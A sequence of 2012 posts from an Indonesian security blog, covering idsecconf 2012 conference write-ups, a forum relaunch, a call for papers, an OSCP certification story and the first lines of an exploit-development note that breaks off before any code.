<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJPeEWoEo7B92nB7a-ygy4ZcufWJiI8pMU3VD36rTPkQjwvdYCkyvBmErXvBeyUmNB6okGUoin1oP2rl3gMNYXEfpl4K0viBaDXt8HDKywjI-q3-p6NkW4GitNQQjqX_0qPV4B/s1600/Au_U4pVCMAA4PP-.jpg-large" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJPeEWoEo7B92nB7a-ygy4ZcufWJiI8pMU3VD36rTPkQjwvdYCkyvBmErXvBeyUmNB6okGUoin1oP2rl3gMNYXEfpl4K0viBaDXt8HDKywjI-q3-p6NkW4GitNQQjqX_0qPV4B/s200/Au_U4pVCMAA4PP-.jpg-large" width="200" /></a></div>
<div>
Secara bersamaan dengan materi ke-dua dimulai, permainan hacking Capture the flag juga dimulai, terdapat 22 orang yang telah mendaftar dan menjadi peserta, dan permainan ini akan berlangsung sampai acara diskusi panel berakhir (15.00 WITA). Permainan ini mengijinkan antar peserta untuk saling menyerang, dan pemenang adalah peserta yang berhasil mengambil alih (pwning) server dengan melewati 2 level yang telah di persiapkan.<a name='more'></a></div>
<div>
Acara kemudian dibreak dulu untuk ibadah dan makan siang. Acara dilanjutkan dengan materi selanjutnya yang membahas mengenai Penerapan modifikasi Algoritma PGP untuk pemanfaatan SMS pada <i>mobile device</i> berbasis java oleh Ayubi Wirara dan Rifqi Azis. Pada kesempatan kali ini pemateri menerapkan protokol Pretty Good Privacy(PGP) yang telah dimodifikasi pada algoritmanya ke SMS, pada pengembangan ini pemateri mempergunakan AES, RSA dan SHA-1. </div>
<div>
<br /></div>
<div>
Materi selanjutnya adalah materi dari Arif Dewantoro yang bertemakan "Taking Down GSM Network dengan melakukan channel flooding", pada kesempatan kali ini Arif selain membahas mengenai openbts dan GNU Radio serta infrastruktur telco, juga mendemokan kegiatan <i>flooding </i>menggunakan handphone "jadul" yang telah mempergunakan firmware OSmocomBB yang telah dimodifikasi.</div>
<div>
<br /></div>
<div>
Materi idsecconf ditutup dengan sebuah materi dari Zaki Akhmad yang membahas mengenai "pengujian keamanan aplikasi mobile; dengan studi kasus pada apliaksi-aplikasi ber-<i>platform</i> Android". Acara selanjutnya adalah Dikusi panel yang mengambil tema mengenai Smartphone dalam sebuah pilar 4k (<i>kemudahan, keterbatasan, kesalahan, keuntungan</i>) dengan panelis adalah: Sdr. Arif Wicaksono (Komite idsecconf), Bpk. Ricky Prajoyo dari KEMKOMINFO, Bpk. Fadli Kasim (dari <i>Linux User Group</i> UjungPandang) dan Bpk. M. Resha mewakili Komunitas Android Makassar, dengan di moderatori oleh Bpk. Hero Suhartono.</div>
<div>
<br /></div>
<div>
Pembahasan diskusi panel cukup menarik, sampai waktu habis masih banyak pertanyaan-pertanyaan yang ingin diajukan oleh peserta. Salah satu yang cukup menarik adalah saat ada penanya yang menanyakan mengapa justru perangkat yang menggunakan android lebih banyak mendapatkan serangan dibandingkan perangkat dengan sistem oeprasi <i>closed source </i>serperti Windows Mobile. Menanggapi hal ini panelis sepakat bahwa tidak bisa dipungkiri kelebihan dari apliaksi opensource serta kebebasan yang diberikan untuk pengembang bisa menjadi bumerang, oleh karena itu dituntut ketelitian dari pengguna, pihak google sendiri telah meluncurkan <i>Bouncer</i>, sebuah layanan yang dapat melakukan <i>scan/</i>pemeriksaan terhadap aplikasi-aplikasi untuk android dan diharapkan dapat meminimalisir aplikasi-aplikasi malware di android.</div>
<div>
<br /></div>
<div>
Sampai saat diskusi panel berakhir ternyata belum terdapat pemenang untuk permainan hacking CTF, hanya ada 1 peserta yang berhasil menembus level 1 (yaitu pemenang ctf online kita: sdr. Uhuy ) sementara 21 peserta lainnya masih berusaha untuk menyelesaikan level 1. Sehingga, lagi-lagi pada CTF kali ini pun tidak didapatkan pemenang, sehingga uhuy dan 1 peserta lainnya yang berhasil mendapatkan <i>certificate </i>untuk mengerjakan level 1 mendapatkan hadiah hiburan.</div>
<div>
<br /></div>
<div>
Acara kemudian dilanjutkan dengan penjelasan mengenai bagaimana uhuy selaku pemenang CTF online, berhasil melewati tiap-tiap level dari 8 level yang dipersiapkan oleh ctf lord (kebetulan 2 level networking (5 dan 7) adalah saya yang membuatnya, sedangkan level untuk reverse dan web (level 1,2,3,4,6,8) dibuat oleh the_day). Pada kesempatan kali ini uhuy mendapatkan tepukan dan aplaus terbanyak dari peserta sepanjang kegiatan (bersaing ketat dengan kang Onno), karena setiap selesai membahas 1 level dia akan mendapat tepukan meriah dari peserta. </div>
<div>
<br /></div>
<div>
Kata penutup dan ucapan bangga serta terima kasih dari Pak Riki Gunawan yang mewakili Kementrian Komunikasi dan Informatika menutup kegiatan hari ini, sekaligus menutup kegiatan idsecconf2012 di Makassar. Saya secara pribadi dan mewakili seluruh komite idsecconf mengucapkan terimakasih sebesar-besarnya kepada pihak yang mendukung suksesnya acara ini, khususnya panitia lokal (Komunitas Makassar Ethical Hacker dan Coconut), seluruh peserta yang tetap antusia sepanjang acara, terutama saat listrik padam, dan suhu ruangan meningkat, Kang Onno W. Purbo, serta seluruh pembicara yang telah berbagi, duet maut mc (dadakan) kegiatan idsecconf2012, dan anda semua.</div>
<div>
<br /></div>
<div>
Sampai jumpa di kegiatan idsecconf2013 !</div>
<div>
<br /></div>
<div>
Materi Kegiatan bisa dilihat dan di download di <a href="http://2012.idsecconf.org/p/materi.html">http://2012.idsecconf.org/p/materi.html</a></div>
<span class="fullpost"></span>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com3tag:blogger.com,1999:blog-8300373.post-28250926363511138782012-06-13T19:05:00.002+07:002012-06-13T19:06:21.508+07:00Kegiatan #idsecconf2012 Write Up Day 1<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiApD2JvjHgiSbSyXsvacc1nCO9zPiwT3QKrTJiOa8GwzmpgHsiVtaCk8lhv1RuXC-f1PhmWz4LkNi7E-0acFu4DBzoB9e52dCKYCmY_ZEsGO87q25g8J_d-RI9nRZxPHP_Xz7E/s1600/logo-full.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiApD2JvjHgiSbSyXsvacc1nCO9zPiwT3QKrTJiOa8GwzmpgHsiVtaCk8lhv1RuXC-f1PhmWz4LkNi7E-0acFu4DBzoB9e52dCKYCmY_ZEsGO87q25g8J_d-RI9nRZxPHP_Xz7E/s320/logo-full.jpg" width="257" /></a></div>
<div style="text-align: justify;">
Hari Pertama, Kegiatan <a href="http://idsecconf.org/" target="_blank">idsecconf</a> yang ke 2012 di kota Makassar dilaksanakan di gedung PWI, diikuti lebih dari 400 peserta, dan saat acara berlangsung diketahui bahwa peserta terjauh datang dari Nabire, Papua. Kegiatan hari pertama dibuka dengan sambutan dari ketua panitia <i>local team</i> #idsecconf2012, yaitu Sdr. Nur Kolish.</div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Acara kemudian di lanjutkan dengan <i>Keynote Speech </i>oleh Bpk. Ir. Bambang Heru Tjahyono, M.Sc selaku Direktur Keamanan Informasi dari Kementrian Komunikasi dan Informatika Republik Indonesia. Dalam <i>keynote </i>yang beliau sampaikan, pak Bambang sedikit menyinggung mengenai dukungan terhadap kegiatan ini adalah salah satu komitmen KEMKOMINFO terhadap penyebaran pengetahuan terkait keamanan infromasi.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Pak Bambang juga sempat menyinggung mengenai banyaknya situs pemerintah yang terkena aksi <i>defacing</i> termasuk situs milik KEMKOMINFO, tetapi meskipun mereka mengetahui pelakunya dan memiliki <i>power </i>untuk melakukan penyidikan dan penindakan, tetapi mereka belum pernha membawanya ke-ranah hukum, dikarenakan beberapa pertimbangan demi kebaikan bersama.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Acara seharusnya dilanjutkan dengan <i>keynote speech </i>dari bapak Onno W. Purbo, tetapi dikarenakan sedikit hambatan transportasi dari Jakarta-Makassar dan dari Bandara Sultan Hasanuddin ke lokasi berlangsungnya kegiatan maka digantikan dengan Pak Josua Sitompul dari KEMKOMINFO yang mensosialisasikan terkait undang-undang ITE, suatu aktifitas bisa dikenai undang-undang ITE harus memenuhi kedua unsur <i>essential </i>yaitu apabila kegiatan yang dilarang itu "<b>dilakukan dengan sengaja dan tanpa hak"<i>.</i></b></div>
<a name='more'></a><br />
<div style="text-align: justify;">
Kang Onno W.Purbo akhirnya bisa tepat waktu untuk memberikan <i style="font-weight: bold;">keynote speech </i>dengan tema "OpenBTS untuk negeri, operator dan anda", pada <i>keynote</i>-nya ini kang Onno menyampaikan mengenai apa itu GNU Radio, openbts serta mendemonstrasikan bagaimana suatu openbts bisa dibuat, termasuk perangkat keras dan perangkat lunak yang dipergunakan. Pada kegiatan ini juga kang Onno mengajak seluruh peserta bergabung di bts yang dia beri nama dengan nama salah satu operator di Asia yang cukup terkenal. Beliau juga mendemosntrasikan panggilan telepon, pengiriman pesan singkat (SMS), sampai membahas kerentanan dan kemungkinan openbts digunakan untuk berlaku sebagai BTS palsu, kemudian menyadap panggilan telpon dan sms, serta pengiriman sms palsu oleh bts.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Pada saat materi kang Onno berlangsung, kegiatan idsecconf sempat terganggu karena aliran listrik dari Perusahaan Listrik Negara sempat terputus, dan mengakibatkan seluruh projector, penerangan dan juga pendingin (kipas, <i>blower</i>) ruangan mati selama hampir 1 jam. Terima kasih atas kesigapan panitia lokal dan juga semangat para peserta yang tidak beranjak 1 orang pun saat materi dari kang Onno berlangsung dalam keadaan kurang penerangan, dan suhu ruangan yang semakin meningkat, sampai saat istriahat siang.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Setelah waktu istirahat untuk beribadah dan makan siang selesai, maka acara dilanjutkan kembali dengan materi dari Sdr. Arief Karfianto yang bertemakan "Countermeasure against Timing Attack on SSH Using Random Delay", disini Karfi menyampaikan dan mendemonstrasikan sebuah materi yang cukup menarik terkait dengan salah satu jenis serangan pada SSH, dan akhirnya mencoba mengimplementasikan Random Delay untuk meminimalisir jenis serangan tersebut.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Kemudian materi dilanjutkan oleh Bpk. Danang Jaya dan tim, yang pada kesempatan kali ini dia menyampaikan bagaimana membuat sebuah aplikasi untuk memberikan dukungan Digital Right Managements pada perangkat mobile, dan mendemokan di sebuah tablet berbasis android untuk membuka gambar yang telah diamankan dengan aplikasi DRM yang telah mereka buat. Acara kemudian dilanjutkan dengan sebuah materi dengan judul "<i>Securing your smartphone for common user</i>" dari Kristian Ibrahim dan Aisyah Amelia yang memberikan sebuah petunjuk praktis bagi pengguna umum untuk mengamankan <i>smartphone </i>yang anda miliki.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Sebelum Acara ditutup dengan diskusi panel, maka diumumkan sekaligus dibuka pendaftaran untuk ajang permainan Hacking CTF (<i>Capture The Flag</i>) oleh the_day yang dibatasi hanya untuk 20 orang peserta untuk dapat memperebutkan uang Rp. 2.000.000 untuk pemenang pertama. Acara kemudian di tutup dengan sebuah diskusi panel yang bertemakan "<i>Predator or Plagiator</i>" problematika komunitas hacking di Indonesia dan bagaimana merajutnya, dengan para panelis, sebagai berikut: Bpk Riko Rahmada dari KEMKOMINFO, Sdr Ph03n1X (Komite idsecconf), sdr. Nur Kolish (MEH) serta bapak Iwan Sumantri dari ID-SIRTII, dan dimoderatori oleh K-159 (Komite idsecconf).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Acara dibuka dengan perkenalan dari masing-masing panelis, dan kemudian moderator memulai dengan pertanyaan ketiap-tiap panelis mengenai istilah predator dan plagiator yang terjadi di komunitas hacking menurut para panelis. Umumnya para panelis sepakat bahwa kegiatan <i>plagiat </i>adalah kegiatan yang kontra-produktif dan tidak patut dilakukan, penggunaan kembali karya orang lain sesuai lisensi yang diberikan terhadap karya tersebut sudah merupakan suatu keharusan, termasuk didalamnya memberikan kredit kepada pembuat karya asli. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Kegiatan hari pertama di tutup dengan berakhirnya diskusi panel.</div>
<span class="fullpost"></span>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com1tag:blogger.com,1999:blog-8300373.post-19797963594308333022012-05-16T17:15:00.002+07:002012-05-16T17:24:36.705+07:00Echoerz in Colour<div class="separator" style="clear: both; text-align: center;">
<a href="https://si0.twimg.com/profile_images/2223012796/echoerzcolour.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://si0.twimg.com/profile_images/2223012796/echoerzcolour.jpg" /></a></div>
<div style="text-align: left;">
Dah lama banget gak bikin gambar, baik di komputer ataupun di kertas. Sekarang akhirnya kesempatan ngewarnain logo <a href="http://forum.echo.or.id/" target="_blank">echoerz</a>, yang sebelumnya kalo gak putih ya item :). </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Enjoy! :). </div>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-55943660570246466062012-04-12T20:36:00.001+07:002012-04-12T20:49:18.322+07:00Forum.echo.or.id Reborn<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcb9dsWGZEeWCU925uv8dkhR4222b6Hch6she8VK6uN_DcqYp0zI_hyphenhyphenPzVY9w1JFJQFHap0KGIE9hmvaZ12XtENAqdXN-yjPXn8X9P2Nn_EfKefGhLAEbth3C5HtF5vaRKchch/s1600/screen-capture-83.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcb9dsWGZEeWCU925uv8dkhR4222b6Hch6she8VK6uN_DcqYp0zI_hyphenhyphenPzVY9w1JFJQFHap0KGIE9hmvaZ12XtENAqdXN-yjPXn8X9P2Nn_EfKefGhLAEbth3C5HtF5vaRKchch/s320/screen-capture-83.png" width="320" /></a></div>
Sudah cukup lama halaman <a href="http://forum.echo.or.id/">http://forum.echo.or.id</a> tidak mengalami perubahan signifikan, bahkan cukup <i>out-of-date</i> dibanding rilis terbarunya (sampai beda 1 generasi rilis), alasan utama tidak dilakukan perubahan karena banyak kustomisasi dan perubahan kode php yang kami lakukan sebelumnya, sehingga tidak memungkinkan untuk sekedar langsung upgrade ke-versi diatasnya.<br />
<br />
Minggu ini, akhirnya tersedia sedikit waktu untuk melakukan <i>upgrade</i> forum, agar menjadi lebih baik dan menarik, dan berikut ini adalah beberapa perubahan dan penambahan yang terjadi pada forum:<br />
<br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">1. <b>Forum dan subforum</b></span></span><br />
<span style="font-family: inherit; line-height: 17px;">a) Forum Warez (</span><a class="postlink-local" href="http://forum.echo.or.id/viewforum.php?f=5" style="direction: ltr; font-family: inherit; line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; unicode-bidi: embed;">viewforum.php?f=5</a><span style="font-family: inherit; line-height: 17px;">)</span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">Forum Warez adalah room untuk berbagi aplikasi gratis, shareware dsb. Forum ini telah di non-aktifkan beberapa tahun lalu dikarenakan melanggar peraturan pihak hosting. Dan sekarang diaktifkan kembali karena echo sudah di host sendiri dan oleh karena kami rasa perlu untuk mengaktifkannya kembali.</span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">b) Forum Computer forensic ( </span><a class="postlink-local" href="http://forum.echo.or.id/viewforum.php?f=60" style="direction: ltr; line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; unicode-bidi: embed;">viewforum.php?f=60</a><span style="line-height: 17px;">)</span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">Forum ini merupakan tempat untuk berdiskusi terkait ranah computer forensic dan anti forensic.</span></span><br />
<a name='more'></a><br />
<span style="font-family: inherit; line-height: 17px;">c) Subforum Pemrograman (</span><a class="postlink-local" href="http://forum.echo.or.id/viewforum.php?f=1" style="direction: ltr; font-family: inherit; line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; unicode-bidi: embed;">viewforum.php?f=1</a><span style="font-family: inherit; line-height: 17px;">)</span><br />
<span style="background-color: white; font-family: inherit; line-height: 17px;">Terdapat beberapa sub-forum pemrograman yang dibuat berdasarkan jenis bahasa pemrograman yang sering dibahas di Forum algoritma </span><br />
<span style="font-family: inherit; line-height: 17px;">d) Subforum Exploit Development (</span><a class="postlink-local" href="http://forum.echo.or.id/viewforum.php?f=38" style="direction: ltr; font-family: inherit; line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; unicode-bidi: embed;">viewforum.php?f=38</a><span style="font-family: inherit; line-height: 17px;">)</span><br />
<span style="background-color: white; font-family: inherit; line-height: 17px;">Terdapat sub-forum Nix-platform dan windows-platform dengan tujuan agar lebih spesifik pengembangan <i>exploit</i> berbasis 2 platform tersebut.</span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br /></span></span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8bD369kkPYsGtVBiRWrANTHgmFpwN_YKl2ACIvxrjdb2GC0_Z0nNgDTdt_ASIh0S4zjqLl8UasrzuE3g3q9aOTey9grCe3mSBxo0IZbJxXvOWyI9LcXRPjsEIfLIQPn7vue8R/s1600/screen-capture-81.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8bD369kkPYsGtVBiRWrANTHgmFpwN_YKl2ACIvxrjdb2GC0_Z0nNgDTdt_ASIh0S4zjqLl8UasrzuE3g3q9aOTey9grCe3mSBxo0IZbJxXvOWyI9LcXRPjsEIfLIQPn7vue8R/s200/screen-capture-81.png" width="200" /></a><span style="background-color: white; font-family: inherit;"><span style="line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">2. <b>Fitur</b></span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Terdapat beberapa fitur/MOD tambahan, diantaranya:</span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">a). Karma</span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">Fitur ini mengijinkan antar user untuk memberikan Karma (+) dan (-), untuk aturan mainnya kurang lebih sebagai berikut:</span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">i. Yang bisa memberi karma, hanya user yang post-nya sudah mencapai 100 post. </span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">ii. Ada batas maksimal untuk dapat memberi karma dalam 1 hari, dan terdapat rentang waktu antara pemberian karma.</span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">ii. Range pemberian karma dari 1-5 , jadi maksimal 1 kali kasih 5 karma.</span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">iv. </span><span style="line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Yang karmanya mencapai 1000 dan valid (validitas di tentukan echo|staff) akan kami tawari menjadi moderator di forum yang dia nyaman untuk memoderatorinya</span><span style="line-height: 17px;">.</span><br style="line-height: 17px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /><span style="line-height: 17px;"><br /></span></span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsOVKV1BqI7YgvdkKSP0Oa5-8CV9ZnUpPk3znM2Sck3oyhy913eiVLIg_UyQaHVhj5fuvYla1KnrlvHHJVekIWlabez7Yu1XIJ0AwAvSIqSTUQw0veH5DmcthDDgq4N_L8of42/s1600/screen-capture-84.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsOVKV1BqI7YgvdkKSP0Oa5-8CV9ZnUpPk3znM2Sck3oyhy913eiVLIg_UyQaHVhj5fuvYla1KnrlvHHJVekIWlabez7Yu1XIJ0AwAvSIqSTUQw0veH5DmcthDDgq4N_L8of42/s320/screen-capture-84.png" width="320" /></a><span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">b). Share On</span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">Fitur ini dipergunakan untuk mengupdate status ke twitter, facebook dsb yang berisi Topic/Posting dari tiap-tiap post yang menarik.</span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;"><br /></span></span><br />
<span style="background-color: white; font-family: inherit;"><span style="line-height: 17px;">Besar harapan kami agar </span></span>forum (yang telah ada dari 2003 dengan member saat ini 40.000 lebih) ini akan kembali menjadi salah satu forum yang aktif melahirkan banyak generasi yang "melek" terhadap <i>IT Security </i>seperti beberapa tahun kebelakang.<br />
<br />
Sebagai catatan: saya pribadi akan sebisa mungkin lebih aktif di forum echo dibanding <i>media social </i>lainnya untuk berdiskusi.<br />
<br />
<span class="fullpost"></span>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-82160016297209831412012-03-24T10:29:00.001+07:002012-03-24T10:29:48.091+07:00IDSECCONF 2012 Call For Paper<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Ksukh4g3pLef_st1OIF3xTbYpcAP1kL9o3nRuKQcgfKU6sUTfx0ThWgKmJz6L48UHirPDx7Jpy7VaEuyTR9cVZ3vI1F4VF6iqz1YFcDIAQdCy9nMTrPItxdjTi2DSrMrnYrz/s1600/screen-capture-70.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Ksukh4g3pLef_st1OIF3xTbYpcAP1kL9o3nRuKQcgfKU6sUTfx0ThWgKmJz6L48UHirPDx7Jpy7VaEuyTR9cVZ3vI1F4VF6iqz1YFcDIAQdCy9nMTrPItxdjTi2DSrMrnYrz/s320/screen-capture-70.png" width="320" /></a></div>
Kami dari komite idsecconf 2012 Makassar memberi kesempatan pada rekan-rekan penggiat keamanan komputer di seluruh Indonesia untuk berpartisipasi lewat penyerahan paper. Topik utama yang kami cari adalah yang berkaitan dengan:<br />
<br />
"Teknik Keamanan dan penerapannya pada Teknologi Mobile"<br />
<br />
Secara explisit, ini mencakup (namun tidak terbatas) Teknik Hacking (attack, defence) pada:<br />
- Perangkat Mobile (smartphones, GPS device, dll)<br />
- Infrastruktrur dan perangkat Jaringan (Wireless, 3G, 4G)<br />
- Sistem Operasi dan Aplikasi Perangkat Mobile<br />
- Mobile Hardware<br />
- Mobile Programming<br />
- Metode audit keamanan<br />
<br />
<a name='more'></a>Kami memprioritaskan slot pembicara bagi partisipan dengan tema paper sebagaimana dimaksud diatas. Namun demikian, kami juga tetap membuka kesempatan pada topik-topik lain semisal:<br />
- Web hacking<br />
- Wireless hacking<br />
- Metode Penetration testing<br />
- Network hacking<br />
- Forensic dan Anti Forensic<br />
- Kriptografi<br />
- Fuzzing<br />
- Exploit development<br />
- System hardening<br />
- Lock Picking<br />
- Open Hardware Implementation<br />
<br />
Jika anda memiliki judul paper diluar cakupan topik diatas, kami masih terbuka untuk mempertimbangkannya selama masih berkaitan dengan security.<br />
<br />
Paper disarankan dibuat dengan program Open Office Writer dengan ukuran halaman "Letter". Gambar bisa langsung disisipkan ke dalam dokumen atau dibuat terpisah. Tulisan dibuat tanpa dipilah-pilah menjadi 2 kolom atau lebih (layaknya format koran atau majalah)<br />
<br />
Format gambar adalah PNG dengan ukuran dimensi maksimal (lebar x tinggi ) 640 x 480 pixel dengan resolusi 72 pixel per inch. Jika nama file dipisahkan, mohon nama file dirujuk dari naskah. Setiap gambar harap disertai keterangan secukupnya. Dokumen harap dikonversi menjadi PDF dengan tingkat resolusi paling maksimal. Ini dilakukan agar kami mudah mereview di platform apapun.<br />
<br />
Pengiriman naskah ditujukan ke e-mail address: submit[eT]idsecconf.org paling lambat 7 Mei 2012. Pengumuman paper yang lolos untuk presentasi <i>on stage</i> akan diumumkan tanggal 21 Mei 2012.<br />
<br />
Keputusan penerimaan atau penolakan paper adalah sepenuhnya wewenang komite idsecconf 2012 dan tidak bisa diganggu gugat. Bagi yang papernya diterima, akan menerima pemberitahuan tertulis lewat e-mail untuk persiapan presentasi on-stage pada acara idsecconf 2012.<br />
<br />
Biaya akomodasi akan ditanggung pihak idsecconf 2012 (biaya perjalanan dan penginapan serta konsumsi).<br />
<br />
Kami tunggu partisipasi anda semuanya!<br />
<br />
salam,<br />
<br />
komite idsecconf 2012y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-65188963535470225262012-03-20T10:07:00.001+07:002012-03-23T01:04:29.801+07:00Short Story about Offsec Training: OSCP<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAuQqtux5Rw_XVDd3FVll26RtIKvSoF-DeH9FXM0_Q2Qs3ozgE4zhc-dBxx_1aWSvbYP-SoT0THYlwphKTkZ45iaSKYtXovDcrfGE0Y2cnsRkAoRZOpnE6xctJXm6NEuVz3vBq/s1600/BBP.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAuQqtux5Rw_XVDd3FVll26RtIKvSoF-DeH9FXM0_Q2Qs3ozgE4zhc-dBxx_1aWSvbYP-SoT0THYlwphKTkZ45iaSKYtXovDcrfGE0Y2cnsRkAoRZOpnE6xctJXm6NEuVz3vBq/s200/BBP.jpg" width="200" /></a></div>
After 30 Days, right after pwning my PAIN and SUFFER<strike>A</strike>ENCE, and taking exam two week after that and last night i was sending the exam report, and this morning i obtained my <a href="http://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/" target="_blank">OSCP</a> Certification. Well, It was me who said that certification program useless, now im taking back a half of what i said, although i believe there still be many kind of certification that useless, but this kind of course that offsec had was different, they didn't teach about how to hack or become a hacker, but they made us hack to learn.<br />
<div>
<br /></div>
<div>
This is not the type of course for "spoon-fed" people type. You got your materials, you got your connections and the labs access, and go "hack as many as you can pwn", you got "try harder" as your one and only manifesto and google as your beloved friends. In my 30 days of lab, i've pwned all machine in the student and IT network, some of machine in dev and admin network. It was huge networks, but yeah it was a lots of fun, i do really had Phun.</div>
<div>
<br /></div>
<div>
<br />
<a name='more'></a>The exam was exactly 23 hours and 45 minute, that was the time you can use to pwned all machine that available as target in new network, and need to find some "flag file". After you've finish the exam time, you need to submit the report in another 24 hour, well, i tell you its a really tight schedule, and the bad thing for me, my report goes up in a really big size, and with our beloved country general type of home inet connection "slow upload stream speed", i failed many time in sending the report. </div>
<div>
<br /></div>
<div>
So, if you had enough spare time, and hard to find a legal machine to pwn3d (when you off-the-job), you best try it; don't bother the certificate, it will come as prize if you really deserve it.</div>
<div>
<br />
<div>
I know i can't share more about the course (especially the technical), but here are the non-technical tips that i believe also usefull:</div>
<div>
<br /></div>
<div>
1. Use 32 bit backtrack because all your target would be 32 bit, i use 64 backtrack and that do give a lot of trouble :D</div>
<div>
2. Don't take exam time too close with the day you've finished your lab time.<br />
3. When you pwned a machine, make sure you copy all the command and capture all of the screen.</div>
<div>
<br />
Anyway, Goodluck!<br />
<br />
<span style="font-size: x-small;"><i>image credit: offsec, found it on one server and look nice :D</i></span></div>
</div>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com6tag:blogger.com,1999:blog-8300373.post-20250472564619017472012-03-17T00:00:00.001+07:002012-03-21T18:42:02.851+07:00Limited Shellcode Space (SEH based BOF example)Just as a quick note if i meet this situation again. During the creation of the exploits, and i want to put a shellcode and the space would not enough (e.g below 20 bytes), but there is still a space in front of the buffer (before address that overwrite SE handler) for example in seh based buffer overflow:<span class="fullpost"></span><br />
<div>
